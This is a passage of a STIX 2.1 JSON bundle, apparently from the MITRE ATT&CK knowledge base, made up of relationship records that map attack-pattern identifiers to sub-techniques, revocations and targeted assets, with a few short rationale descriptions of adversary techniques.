"relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f61e474c-d7be-411e-a30e-0a1ef872fe51", "created": "2023-09-29T17:05:20.132Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:05:20.132Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f630f321-d227-414b-9272-fe19268779e0", "created": "2020-10-02T16:42:42.607Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884", "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f6514d17-d599-4a45-93b2-a80b4aa39dde", "created": "2020-01-31T12:36:39.323Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--56fca983-1cf1-4fd1-bda0-5e170a37ab59", "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f655e6a0-431c-4996-859d-2e1952f26d2e", "created": "2020-10-02T16:01:35.489Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413", "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f65fa052-5ad0-4fc3-b579-ee33d1225659", "created": "2023-09-28T19:55:58.229Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:55:58.229Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f67134f6-7f34-4b8a-89ef-9ecd6d9ca191", "created": "2020-01-30T19:55:39.116Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--c23b740b-a42b-47a1-aec2-9d48ddd547ff", "target_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f691dde5-bb2d-411b-a381-b33e0ab673d6", "created": "2023-09-28T20:12:09.661Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:12:09.661Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f6c52b80-6bbc-4a80-9455-40046356cb98", "created": "2020-02-11T19:13:33.736Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", "target_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f6dab4c6-6f2e-4038-827f-16aa1fd7d8e9", "created": "2020-03-19T19:17:58.690Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--36675cd3-fe00-454c-8516-aebecacbe9d9", "target_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": true, "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f6e3972b-afc2-4dd6-972a-4fe73747dfe4", "created": "2023-09-05T14:19:19.911Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-05T14:19:19.911Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ca00366b-83a1-4c7b-a0ce-8ff950a7c87f", "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f7215c1f-7bd7-41bd-8466-76caac225c7c", "created": "2023-09-29T16:45:42.977Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:45:42.977Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f72a7a30-bab4-445b-b226-d5c3cd1a5846", "created": "2023-09-29T18:47:39.450Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:47:39.450Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f7a11ad8-80ac-4b0e-8749-102958f57f62", "created": "2020-10-19T19:53:10.862Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", "target_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f7b8ef19-94d4-46a2-9fcc-25503d324366", "created": "2024-05-22T17:25:50.691Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:39:08.920Z", "description": "Asset Mapping Rationale: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques.", "relationship_type": "targets", "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f7bdbc1f-d08c-48a0-a474-a79b91526138", "created": "2023-09-28T20:31:31.498Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:31:31.498Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f7d672f6-993b-4036-961d-f6e22e94446c", "created": "2024-04-09T20:48:30.734Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:48:30.734Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f823cffe-1f48-499e-a7b9-58f12e0b95b4", "created": "2020-03-09T13:00:19.485Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", "target_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f8456c9b-a4a5-4f13-94e3-54c787b21089", "created": "2023-09-28T20:16:40.519Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:16:40.519Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f8aaf144-17a2-41b5-b723-a80cb43a8c75", "created": "2020-10-02T16:47:16.805Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c", "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f8c320cc-97f5-4b3a-8847-92c42b6a48b7", "created": "2020-02-11T18:27:15.862Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f92764db-a880-4726-9d28-a035170f790c", "created": "2023-09-28T21:22:35.236Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:22:35.236Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f96dd8b2-6b49-4a64-a867-a571a9c0016e", "created": "2024-05-23T04:17:26.163Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:39:45.734Z", "description": "Asset Mapping Rationale: Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. On a network devices, adversaries may reformat the file system using Network Device CLI commands such as format", "relationship_type": "targets", "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f9867ca2-18a1-4e84-ad1d-61d7c85fe4b3", "created": "2020-06-23T19:12:25.121Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f9907fb1-976b-4f51-ac13-b45f2ff9452b", "created": "2023-09-28T19:48:37.072Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:48:37.072Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fac4bc88-af9b-4eec-b041-e4138b49c3c0", "created": "2023-09-29T16:28:04.180Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:28:04.180Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fadbdca3-3c98-497c-a156-e53b89664359", "created": "2023-09-28T20:16:55.038Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:16:55.038Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fb82f6d3-0e6b-4fa5-a54a-f7deb28f8324", "created": "2020-02-12T16:47:16.693Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--66f73398-8394-4711-85e5-34c8540b22a5", "target_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fc123d2e-3cd6-4d14-929c-8eb9c9a7cdd2", "created": "2020-10-01T01:18:35.632Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d", "target_ref": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fc189fa0-1235-46ac-a802-f226dc0ec4e1", "created": "2023-09-29T17:38:28.664Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:38:28.664Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fc26d209-c7fb-4d59-82da-0be7c72c651d", "created": "2020-01-14T01:27:31.402Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fc787de3-8a82-43f6-b649-f01a7006be54", "created": "2020-06-24T22:30:55.923Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fca5a1c7-8548-4621-97b5-023572344ae4", "created": "2020-10-19T19:49:24.478Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", "target_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fcba6a58-72b0-4d54-a887-740624e22f6f", "created": "2024-03-26T15:42:36.840Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-26T15:42:36.840Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fcc47ea4-e7bf-4d33-8601-f2fe47d2021e", "created": "2021-06-25T12:27:20.373Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fcdcb31d-2e52-43f4-a883-c60325a13075", "created": "2020-03-02T14:24:27.173Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92", "target_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fcfa67b5-03dc-4d92-bc34-0f483d48bc6a", "created": "2020-01-31T12:39:19.056Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fd309395-8fcc-402c-9227-90ac897fd602", "created": "2024-03-26T15:41:39.905Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-26T15:41:39.905Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fd31c763-8e36-4f6f-9238-fed081b524b3", "created": "2020-02-11T18:24:04.818Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484", "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", 